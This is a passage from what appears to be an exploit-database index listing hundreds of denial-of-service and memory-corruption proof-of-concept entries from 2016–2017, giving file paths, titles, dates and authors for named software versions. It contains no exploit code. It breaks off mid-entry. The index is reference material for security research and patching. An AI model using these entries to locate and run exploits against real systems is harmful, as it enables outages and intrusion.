-40320,exploits/php/dos/40320.php,"PHP 5.0.0 - 'snmpset()' Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos, -40321,exploits/php/dos/40321.php,"PHP 7.0 - 'AppendIterator::append' Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos, -40329,exploits/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos, -40439,exploits/windows/dos/40439.py,"VideoLAN VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos, -40449,exploits/android/dos/40449.txt,"Google Android - Insufficient Binder Message Verification Pointer Leak",2016-10-03,"Google Security Research",android,dos, -40502,exploits/android/dos/40502.txt,"Google Android - 'gpsOneXtra' Data Files Denial of Service",2016-10-11,"Nightwatch Cybersecurity Research",android,dos, -40508,exploits/windows/dos/40508.txt,"Cisco Webex Player T29.10 - '.WRF' Use-After-Free Memory Corruption",2016-10-12,COSIG,windows,dos, -40509,exploits/windows/dos/40509.txt,"Cisco Webex Player T29.10 - '.ARF' Out-of-Bounds Memory Corruption",2016-10-12,COSIG,windows,dos, -40510,exploits/multiple/dos/40510.txt,"Adobe Flash Player 23.0.0.162 - '.SWF' ConstantPool Critical Memory Corruption",2016-10-12,COSIG,multiple,dos, -40515,exploits/android/dos/40515.txt,"Google Android - Binder Generic ASLR Leak",2016-10-12,"Google Security Research",android,dos, -40524,exploits/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",2016-10-13,"Antonio Z.",osx,dos, -40536,exploits/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",2016-10-14,"sultan albalawi",windows,dos, -40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",osx,dos, -40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,windows,dos, -40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,windows,dos, -40598,exploits/windows/dos/40598.txt,"Microsoft Windows - 'win32k.sys' TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)",2016-10-20,"Google Security Research",windows,dos, -40599,exploits/windows/dos/40599.txt,"Microsoft Windows - 'win32k.sys' TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",windows,dos, -40600,exploits/windows/dos/40600.txt,"Microsoft Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",windows,dos, -40601,exploits/windows/dos/40601.txt,"Microsoft Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",windows,dos, -40603,exploits/windows/dos/40603.html,"Microsoft Edge - 'Function.apply' Information Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos, -40605,exploits/windows/dos/40605.html,"Microsoft Edge - Spread Operator Stack Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos, -40617,exploits/windows/dos/40617.txt,"RealPlayer 18.1.5.705 - '.QCP' Crash (PoC)",2016-10-21,"Alwin Peppels",windows,dos, -40618,exploits/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos, -40632,exploits/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Denial of Service",2016-10-26,ScrR1pTK1dd13,windows,dos, -40647,exploits/windows/dos/40647.py,"freeFTPd 1.0.8 - 'mkd' Denial of Service",2016-10-31,ScrR1pTK1dd13,windows,dos, -40648,exploits/windows/dos/40648.txt,"Micro Focus Rumba 9.4 - Local Denial of Service",2016-10-31,"Umit Aksu",windows,dos, -40635,exploits/windows/dos/40635.py,"uSQLite 1.0.0 - Denial of Service",2016-10-27,"Peter Baris",windows,dos, -40638,exploits/windows/dos/40638.py,"CherryTree 0.36.9 - Memory Corruption (PoC)",2016-10-27,n30m1nd,windows,dos, -40649,exploits/windows/dos/40649.html,"Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow",2016-10-31,"Umit Aksu",windows,dos, -40652,exploits/osx/dos/40652.c,"Apple OS X Kernel - IOBluetoothFamily.kext Use-After-Free",2016-10-31,"Google Security Research",osx,dos, -40654,exploits/multiple/dos/40654.txt,"Apple OS X/iOS - 'mach_ports_register' Multiple Memory Safety s",2016-10-31,"Google Security Research",multiple,dos, -40656,exploits/windows/dos/40656.txt,"NVIDIA Driver - Escape Code Leaks Uninitialised ExAllocatePoolWithTag Memory to Userspace",2016-10-31,"Google Security Research",windows,dos, -40657,exploits/windows/dos/40657.txt,"NVIDIA Driver - Unchecked Write to User-Provided Pointer in Escape 0x700010d",2016-10-31,"Google Security Research",windows,dos, -40658,exploits/windows/dos/40658.txt,"NVIDIA Driver - No Bounds Checking in Escape 0x7000194",2016-10-31,"Google Security Research",windows,dos, -40659,exploits/windows/dos/40659.txt,"NVIDIA Driver - Unchecked Write to User-Provided Pointer in Escape 0x600000D",2016-10-31,"Google Security Research",windows,dos, -40661,exploits/windows/dos/40661.txt,"NVIDIA Driver - Escape 0x100010b Missing Bounds Check",2016-10-31,"Google Security Research",windows,dos, -40662,exploits/windows/dos/40662.txt,"NVIDIA Driver - No Bounds Checking in Escape 0x7000170",2016-10-31,"Google Security Research",windows,dos, -40663,exploits/windows/dos/40663.txt,"NVIDIA Driver - Unchecked User-Provided Pointer in Escape 0x5000027",2016-10-31,"Google Security Research",windows,dos, -40664,exploits/windows/dos/40664.txt,"NVIDIA Driver - Incorrect Bounds Check in Escape 0x70001b2",2016-10-31,"Google Security Research",windows,dos, -40665,exploits/windows/dos/40665.txt,"NVIDIA Driver - Missing Bounds Check in Escape 0x100009a",2016-10-31,"Google Security Research",windows,dos, -40666,exploits/windows/dos/40666.txt,"NVIDIA Driver - Missing Bounds Check in Escape 0x70000d5",2016-10-31,"Google Security Research",windows,dos, -40667,exploits/windows/dos/40667.txt,"NVIDIA Driver - Stack Buffer Overflow in Escape 0x7000014",2016-10-31,"Google Security Research",windows,dos, -40668,exploits/windows/dos/40668.txt,"NVIDIA Driver - Stack Buffer Overflow in Escape 0x10000e9",2016-10-31,"Google Security Research",windows,dos, -40685,exploits/windows/dos/40685.html,"Microsoft Internet Explorer 9 - MSHTML CAttrArray Use-After-Free (MS14-056)",2016-11-02,Skylined,windows,dos, -40687,exploits/hardware/dos/40687.txt,"SunellSecurity NVR / Camera - Denial of Service",2016-11-02,qwsj,hardware,dos, -40691,exploits/windows/dos/40691.html,"Microsoft Internet Explorer 11 - MSHTML CView::CalculateImageImmunity Use-After-Free",2016-11-02,Skylined,windows,dos, -40695,exploits/linux/dos/40695.c,"Memcached 1.4.33 - 'Crash' (PoC)",2016-11-01,"p0wd3r / dawu",linux,dos, -40696,exploits/linux/dos/40696.c,"Memcached 1.4.33 - 'Add' (PoC)",2016-11-01,"p0wd3r / dawu",linux,dos, -40697,exploits/linux/dos/40697.c,"Memcached 1.4.33 - 'sasl' (PoC)",2016-11-01,"p0wd3r / dawu",linux,dos, -40699,exploits/windows/dos/40699.txt,"Axessh 4.2 - Denial of Service",2016-11-03,hyp3rlinx,windows,dos, -40703,exploits/windows/dos/40703.pl,"Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service",2016-11-08,"Todor Donev",windows,dos, -40722,exploits/windows/dos/40722.html,"Microsoft Internet Explorer 9 - MSHTML CPtsTextParaclient::CountApes Out-of-Bounds Read",2016-11-07,Skylined,windows,dos, -40731,exploits/linux/dos/40731.c,"Linux Kernel - TCP Related Read Use-After-Free",2016-08-18,"Marco Grassi",linux,dos, -40744,exploits/windows/dos/40744.txt,"Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)",2016-11-09,"laurent gaffie",windows,dos, -40745,exploits/windows/dos/40745.c,"Microsoft Windows Kernel - 'win32k' Denial of Service (MS16-135)",2016-11-09,TinySec,windows,dos, -40747,exploits/windows/dos/40747.html,"Microsoft WININET.dll - 'CHttp­Header­Parser::Parse­Status­Line' Out-of-Bounds Read (MS16-104/MS16-105)",2016-11-10,Skylined,windows,dos, -40748,exploits/windows/dos/40748.html,"Microsoft Internet Explorer 11/10/9 - MSHTML 'PROPERTYDESC::Handle­Style­Component­Property' Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos, -40761,exploits/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos, -40762,exploits/linux/dos/40762.c,"Linux Kernel 4.8.0-22/3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos, -40766,exploits/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos, -40773,exploits/windows/dos/40773.html,"Microsoft Edge - 'eval' Type Confusion",2016-11-17,"Google Security Research",windows,dos, -40787,exploits/windows/dos/40787.html,"Microsoft Edge - 'Array.splice' Heap Overflow",2016-11-18,"Google Security Research",windows,dos, -40779,exploits/windows/dos/40779.py,"Moxa SoftCMS 1.5 - Denial of Service (PoC)",2016-11-18,"Zhou Yu",windows,dos, -40784,exploits/windows/dos/40784.html,"Microsoft Edge - 'FillFromPrototypes' Type Confusion",2016-11-18,"Google Security Research",windows,dos, -40785,exploits/windows/dos/40785.html,"Microsoft Edge - 'Array.filter' Info Leak",2016-11-18,"Google Security Research",windows,dos, -40786,exploits/windows/dos/40786.html,"Microsoft Edge - 'Array.reverse' Overflow",2016-11-18,"Google Security Research",windows,dos, -40790,exploits/linux/dos/40790.txt,"Palo Alto Networks PanOS - appweb3 Stack Buffer Overflow",2016-11-18,"Google Security Research",linux,dos, -40793,exploits/windows/dos/40793.html,"Microsoft Edge Scripting Engine - Memory Corruption (MS16-129)",2016-11-21,Security-Assessment.com,windows,dos, -40797,exploits/windows/dos/40797.html,"Microsoft Edge - 'CText­Extractor::Get­Block­Text' Out-of-Bounds Read (MS16-104)",2016-11-21,Skylined,windows,dos, -40798,exploits/windows/dos/40798.html,"Microsoft Internet Explorer 8 - jscript 'Reg­Exp­Base::FBad­Header' Use-After-Free (MS15-018)",2016-11-21,Skylined,windows,dos, -40806,exploits/linux/dos/40806.py,"NTP 4.2.8p8 - Denial of Service",2016-11-21,"Magnus Klaaborg Stubman",linux,dos, -40814,exploits/hardware/dos/40814.txt,"TP-LINK TDDP - Multiple Vulnerabilities",2016-11-22,"Core Security",hardware,dos,1040 -40815,exploits/windows/dos/40815.html,"Microsoft Internet Explorer 8 - MSHTML 'Ptls5::Ls­Find­Span­Visual­Boundaries' Memory Corruption",2016-11-22,Skylined,windows,dos, -40828,exploits/windows/dos/40828.py,"Core FTP LE 2.2 - 'SSH/SFTP' Remote Buffer Overflow (PoC)",2016-11-27,hyp3rlinx,windows,dos, -40893,exploits/windows/dos/40893.html,"Microsoft Internet Explorer 9 - MSHTML CDisp­Node::Insert­Sibling­Node Use-After-Free (MS13-037) (1)",2016-12-09,Skylined,windows,dos, -40894,exploits/windows/dos/40894.html,"Microsoft Internet Explorer 9 - MSHTML CDisp­Node::Insert­Sibling­Node Use-After-Free (MS13-037) (2)",2016-12-09,Skylined,windows,dos, -40840,exploits/linux/dos/40840.py,"NTP 4.2.8p3 - Denial of Service",2016-11-28,"Magnus Klaaborg Stubman",linux,dos, -40841,exploits/windows/dos/40841.html,"Microsoft Internet Explorer 8 - MSHTML 'SRun­Pointer::Span­Qualifier/Run­Type' Out-Of-Bounds Read (MS15-009)",2016-11-28,Skylined,windows,dos, -40843,exploits/windows/dos/40843.html,"Microsoft Internet Explorer 11 - MSHTML 'CGenerated­Content::Has­Generated­SVGMarker' Type Confusion",2016-11-28,Skylined,windows,dos, -40844,exploits/windows/dos/40844.html,"Microsoft Internet Explorer 10 - MSHTML 'CEdit­Adorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,windows,dos, -40845,exploits/windows/dos/40845.txt,"Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos, -40866,exploits/linux/dos/40866.py,"NetCat 0.7.1 - Denial of Service",2016-12-05,n30m1nd,linux,dos, -40875,exploits/windows/dos/40875.html,"Microsoft Edge - JSON.parse Info Leak",2016-12-06,"Google Security Research",windows,dos, -40876,exploits/android/dos/40876.txt,"Google Android - 'IOMXNodeInstance::enableNativeBuffers' Unchecked Index",2016-12-06,"Google Security Research",android,dos, -40878,exploits/windows/dos/40878.txt,"Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125)",2016-12-06,Skylined,windows,dos, -40879,exploits/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)",2016-12-06,Skylined,windows,dos, -40880,exploits/windows/dos/40880.txt,"Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)",2016-12-06,Skylined,windows,dos, -40883,exploits/windows/dos/40883.py,"Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)",2016-12-06,"Jeremy Brown",windows,dos, -40885,exploits/windows/dos/40885.py,"Dual DHCP DNS Server 7.29 - Denial of Service",2016-12-07,R-73eN,windows,dos, -40886,exploits/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",hardware,dos, -40888,exploits/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos, -40896,exploits/windows/dos/40896.html,"Microsoft Internet Explorer 9 - MSHTML CElement::Has­Flag Memory Corruption",2016-12-09,Skylined,windows,dos, -40899,exploits/linux/dos/40899.py,"OpenSSL 1.1.0a/1.1.0b - Denial of Service",2016-12-11,Silverfox,linux,dos, -40905,exploits/windows/dos/40905.py,"Serva 3.0.0 - HTTP Server Denial of Service",2016-12-12,LiquidWorm,windows,dos, -40906,exploits/ios/dos/40906.txt,"iOS 10.1.x - Certificate File Memory Corruption",2016-12-12,"Maksymilian Arciemowicz",ios,dos, -40909,exploits/linux/dos/40909.py,"Apache 2.4.23 mod_http2 - Denial of Service",2016-12-12,"Jungun Baek",linux,dos, -40910,exploits/hardware/dos/40910.txt,"TP-LINK TD-W8151N - Denial of Service",2016-12-13,"Persian Hack Team",hardware,dos, -40914,exploits/android/dos/40914.java,"Samsung Devices KNOX Extensions - OTP TrustZone Trustlet Stack Buffer Overflow",2016-12-13,"Google Security Research",android,dos, -40915,exploits/windows/dos/40915.txt,"Adobe Animate 15.2.1.95 - Memory Corruption",2016-12-14,hyp3rlinx,windows,dos, -40925,exploits/windows/dos/40925.py,"Orthanc DICOM Server 1.1.0 - Memory Corruption",2016-12-16,LiquidWorm,windows,dos, -40922,exploits/windows/dos/40922.html,"Microsoft Internet Explorer 9 - MSHTML CMarkup::Reload­In­Compat­View Use-After-Free",2016-12-15,Skylined,windows,dos, -40923,exploits/windows/dos/40923.html,"Microsoft Internet Explorer 9 - IEFRAME CMarkup::Remove­Pointer­Pos Use-After-Free (MS13-055)",2016-12-15,Skylined,windows,dos, -40926,exploits/windows/dos/40926.py,"OsiriX DICOM Viewer 8.0.1 - Memory Corruption",2016-12-16,LiquidWorm,windows,dos, -40927,exploits/windows/dos/40927.py,"ConQuest DICOM Server 1.4.17d - Stack Buffer Overflow",2016-12-16,LiquidWorm,windows,dos, -40928,exploits/linux/dos/40928.py,"DCMTK 3.6.0 storescp - Stack Buffer Overflow",2016-12-16,LiquidWorm,linux,dos, -40929,exploits/osx/dos/40929.py,"Horos 2.1.0 DICOM Medical Image Viewer - Denial of Service",2016-12-16,LiquidWorm,osx,dos, -40933,exploits/windows/dos/40933.svg,"Microsoft Internet Explorer 9 - IEFRAME CMarkup­Pointer::Move­To­Gap Use-After-Free",2016-12-16,Skylined,windows,dos, -40935,exploits/windows/dos/40935.html,"Microsoft Internet Explorer 9 - IEFRAME CView::Ensure­Size Use-After-Free (MS13-021)",2016-12-16,Skylined,windows,dos, -40944,exploits/multiple/dos/40944.py,"Google Chrome < 31.0.1650.48 - HTTP 1xx base::String­Tokenizer­T<...>::Quick­Get­Next Out-of-Bounds Read",2016-12-19,Skylined,multiple,dos, -40945,exploits/android/dos/40945.txt,"Google Android - WifiNative::setHotlist Stack Overflow",2016-12-20,"Google Security Research",android,dos, -40946,exploits/windows/dos/40946.html,"Microsoft Internet Explorer 11 - MSHTML CSplice­Tree­Engine::Remove­Splice Use-After-Free (MS14-035)",2016-12-20,Skylined,windows,dos, -40947,exploits/windows/dos/40947.html,"Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145)",2016-12-21,"Google Security Research",windows,dos, -40948,exploits/windows/dos/40948.html,"Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144)",2016-12-21,"Google Security Research",windows,dos, -40952,exploits/macos/dos/40952.c,"Apple macOS 10.12.1 Kernel - Writable Privileged IOKit Registry Properties Code Execution",2016-12-22,"Google Security Research",macos,dos, -40954,exploits/macos/dos/40954.c,"Apple macOS 10.12 - Double vm_deallocate in Userspace MIG Code Use-After-Free",2016-12-22,"Google Security Research",macos,dos, -40955,exploits/multiple/dos/40955.txt,"macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free",2016-12-22,"Google Security Research",multiple,dos, -40958,exploits/multiple/dos/40958.c,"macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos, -40959,exploits/multiple/dos/40959.c,"macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos, -40964,exploits/windows/dos/40964.py,"XAMPP Control Panel - Denial Of Service",2016-12-25,hyp3rlinx,windows,dos, -40965,exploits/windows/dos/40965.py,"FTPShell Server 6.36 - '.csv' Local Denial of Service",2016-12-26,"sultan albalawi",windows,dos, -40985,exploits/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,linux,dos, -40994,exploits/multiple/dos/40994.html,"Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing",2017-01-08,"Aaditya Purani",multiple,dos, -40996,exploits/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",php,dos, -41008,exploits/multiple/dos/41008.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (1)",2017-01-11,COSIG,multiple,dos, -41012,exploits/multiple/dos/41012.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (2)",2017-01-11,COSIG,multiple,dos, -41018,exploits/windows/dos/41018.txt,"Boxoft Wav 1.0 - Buffer Overflow",2017-01-11,Vulnerability-Lab,windows,dos, -41025,exploits/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",windows,dos, -41030,exploits/windows/dos/41030.py,"SapLPD 7.40 - Denial of Service",2016-12-28,"Peter Baris",windows,dos, -41042,exploits/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use-After-Free",2017-01-13,"Marcin Ressel",windows,dos, -41142,exploits/unix/dos/41142.c,"SunOS 5.11 ICMP - Denial of Service",2017-01-22,"Todor Donev",unix,dos, -41145,exploits/multiple/dos/41145.py,"Oracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service",2017-01-23,ERPScan,multiple,dos, -41160,exploits/windows/dos/41160.py,"Autodesk Backburner Manager 3 < 2016.0.0.2150 - Null Dereference Denial of Service",2017-01-26,b0nd,windows,dos, -41161,exploits/android/dos/41161.txt,"Google Android - 'pm_qos' KASLR Bypass",2017-01-26,"Google Security Research",android,dos, -41163,exploits/multiple/dos/41163.txt,"macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption",2017-01-26,"Google Security Research",multiple,dos, -41164,exploits/multiple/dos/41164.c,"macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos, -41165,exploits/multiple/dos/41165.c,"macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos, -41192,exploits/multiple/dos/41192.c,"OpenSSL 1.1.0 - Remote Client Denial of Service",2017-01-26,"Guido Vranken",multiple,dos, -41211,exploits/android/dos/41211.txt,"Google Android - 'cfp_ropp_new_key_reenc' / 'cfp_ropp_new_key' RKP Memory Corruption",2017-02-01,"Google Security Research",android,dos, -41212,exploits/android/dos/41212.txt,"Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation",2017-02-01,"Google Security Research",android,dos, -41213,exploits/osx/dos/41213.html,"Apple WebKit - 'HTMLFormElement::reset()' Use-After Free",2017-02-01,"Google Security Research",osx,dos, -41214,exploits/multiple/dos/41214.html,"Google Chrome - 'HTMLKeygenElement::shadowSelect()' Type Confusion",2017-02-01,"Google Security Research",multiple,dos, -41215,exploits/multiple/dos/41215.html,"Apple WebKit - 'HTMLKeygenElement' Type Confusion",2017-02-01,"Google Security Research",multiple,dos, -41216,exploits/multiple/dos/41216.html,"Apple WebKit - Type Confusion in RenderBox with Accessibility Enabled",2017-02-01,"Google Security Research",multiple,dos, -41218,exploits/android/dos/41218.txt,"Google Android - RKP Information Disclosure via s2-remapping Physical Ranges",2017-02-01,"Google Security Research",android,dos, -41219,exploits/hardware/dos/41219.txt,"QNAP NVR/NAS - Buffer Overflow",2017-02-01,bashis,hardware,dos, -41222,exploits/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",windows,dos, -41232,exploits/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",android,dos, -41278,exploits/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,openbsd,dos,80 -41363,exploits/windows/dos/41363.txt,"Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure",2017-02-15,"Google Security Research",windows,dos, -41350,exploits/linux/dos/41350.c,"Linux Kernel 3.10.0 (CentOS7) - Denial of Service",2017-02-12,FarazPajohan,linux,dos, -41351,exploits/android/dos/41351.txt,"LG G4 - lgdrmserver Binder Service Multiple Race Conditions",2017-02-14,"Google Security Research",android,dos, -41352,exploits/android/dos/41352.txt,"LG G4 - lghashstorageserver Directory Traversal",2017-02-14,"Google Security Research",android,dos, -41353,exploits/android/dos/41353.txt,"LG G4 - Touchscreen Driver write_log Kernel Read/Write",2017-02-14,"Google Security Research",android,dos, -41354,exploits/android/dos/41354.txt,"Google Android - Inter-process munmap in android.util.MemoryIntArray",2017-02-14,"Google Security Research",android,dos, -41355,exploits/android/dos/41355.txt,"Google Android - android.util.MemoryIntArray Ashmem Race Conditions",2017-02-14,"Google Security Research",android,dos, -41357,exploits/windows/dos/41357.html,"Microsoft Edge - TypedArray.sort Use-After-Free (MS16-145)",2017-02-14,"Google Security Research",windows,dos, -41364,exploits/windows/dos/41364.txt,"NVIDIA Driver 375.70 - DxgkDdiEscape 0x100008b Out-of-Bounds Read/Write",2017-02-15,"Google Security Research",windows,dos, -41365,exploits/windows/dos/41365.txt,"NVIDIA Driver 375.70 - Buffer Overflow in Command Buffer Submission",2017-02-15,"Google Security Research",windows,dos, -41367,exploits/windows/dos/41367.txt,"GOM Player 2.3.10.5266 - '.fpx' Denial of Service",2017-02-15,"Peter Baris",windows,dos, -41369,exploits/hardware/dos/41369.txt,"Cisco ASA - WebVPN CIFS Handling Buffer Overflow",2017-02-15,"Google Security Research",hardware,dos, -41417,exploits/windows/dos/41417.txt,"Microsoft Office PowerPoint 2010 - 'MSO!Ordinal5429' Missing Length Check Heap Corruption",2017-02-21,"Google Security Research",windows,dos, -41418,exploits/windows/dos/41418.txt,"Microsoft Office PowerPoint 2010 - MSO/OART Heap Out-of-Bounds Access",2017-02-21,"Google Security Research",windows,dos, -41419,exploits/windows/dos/41419.txt,"Microsoft Office PowerPoint 2010 - GDI 'GDI32!ConvertDxArray' Insufficient Bounds Check",2017-02-21,"Google Security Research",windows,dos, -41420,exploits/multiple/dos/41420.txt,"Adobe Flash - MP4 AMF Parsing Overflow",2017-02-21,"Google Security Research",multiple,dos, -41421,exploits/multiple/dos/41421.txt,"Adobe Flash - SWF Stack Corruption",2017-02-21,"Google Security Research",multiple,dos, -41422,exploits/multiple/dos/41422.txt,"Adobe Flash - Use-After-Free in Applying Bitmap Filter",2017-02-21,"Google Security Research",multiple,dos, -41423,exploits/multiple/dos/41423.txt,"Adobe Flash - YUVPlane Decoding Heap Overflow",2017-02-21,"Google Security Research",multiple,dos, -41425,exploits/windows/dos/41425.txt,"EasyCom For PHP 4.0.0 - Buffer Overflow (PoC)",2017-02-22,hyp3rlinx,windows,dos, -41426,exploits/windows/dos/41426.txt,"EasyCom For PHP 4.0.0 - Denial of Service",2017-02-22,hyp3rlinx,windows,dos, -41434,exploits/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos, -41454,exploits/windows/dos/41454.html,"Microsoft Edge / Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos, -41457,exploits/linux/dos/41457.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)",2017-02-26,"Andrey Konovalov",linux,dos, -41474,exploits/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",windows,dos, -41475,exploits/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos, -41537,exploits/hardware/dos/41537.py,"Conext ComBox 865-1058 - Denial of Service",2017-03-02,"Mark Liapustin & Arik Kublanov",hardware,dos, -41547,exploits/win_x86-64/dos/41547.py,"Evostream Media Server 1.7.1 (x64) - Denial of Service",2017-03-07,"Peter Baris",win_x86-64,dos, -41565,exploits/hardware/dos/41565.py,"Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service",2017-03-09,"Quentin Olagne",hardware,dos, -41596,exploits/windows/dos/41596.py,"Cerberus FTP Server 8.0.10.1 - Denial of Service",2017-03-13,"Peter Baris",windows,dos, -41601,exploits/hardware/dos/41601.c,"MikroTik Router - ARP Table OverFlow Denial Of Service",2017-03-05,FarazPajohan,hardware,dos, -41608,exploits/multiple/dos/41608.txt,"Adobe Flash - Metadata Parsing Out-of-Bounds Read",2017-03-15,"Google Security Research",multiple,dos, -41609,exploits/multiple/dos/41609.txt,"Adobe Flash - MovieClip Attach init Object Use-After-Free",2017-03-15,"Google Security Research",multiple,dos, -41610,exploits/multiple/dos/41610.txt,"Adobe Flash - ATF Thumbnailing Heap Overflow",2017-03-15,"Google Security Research",multiple,dos, -41611,exploits/multiple/dos/41611.txt,"Adobe Flash - ATF Planar Decompression Heap Overflow",2017-03-15,"Google Security Research",multiple,dos, -41612,exploits/multiple/dos/41612.txt,"Adobe Flash - AVC Header Slicing Heap Overflow",2017-03-15,"Google Security Research",multiple,dos, -41615,exploits/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow",2017-03-15,"Hossein Lotfi",windows,dos, -41620,exploits/windows/dos/41620.txt,"Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow",2017-03-16,"Nassim Asrir",windows,dos, -41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",windows,dos, -41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,windows,dos, -41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,windows,dos, -41639,exploits/windows/dos/41639.txt,"ExtraPuTTY 0.29-RC2 - Denial of Service",2017-03-20,hyp3rlinx,windows,dos, -41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",hardware,dos, -41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",windows,dos, -41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",windows,dos, -41647,exploits/windows/dos/41647.txt,"Microsoft Windows - 'USP10!otlList::insertAt' Uniscribe Font Processing Heap-Based Buffer Overflow (MS17-011)",2017-03-20,"Google Security Research",windows,dos, -41648,exploits/windows/dos/41648.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Read/Write in 'USP10!AssignGlyphTypes' (MS17-011)",2017-03-20,"Google Security Research",windows,dos, -41649,exploits/windows/dos/41649.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption in 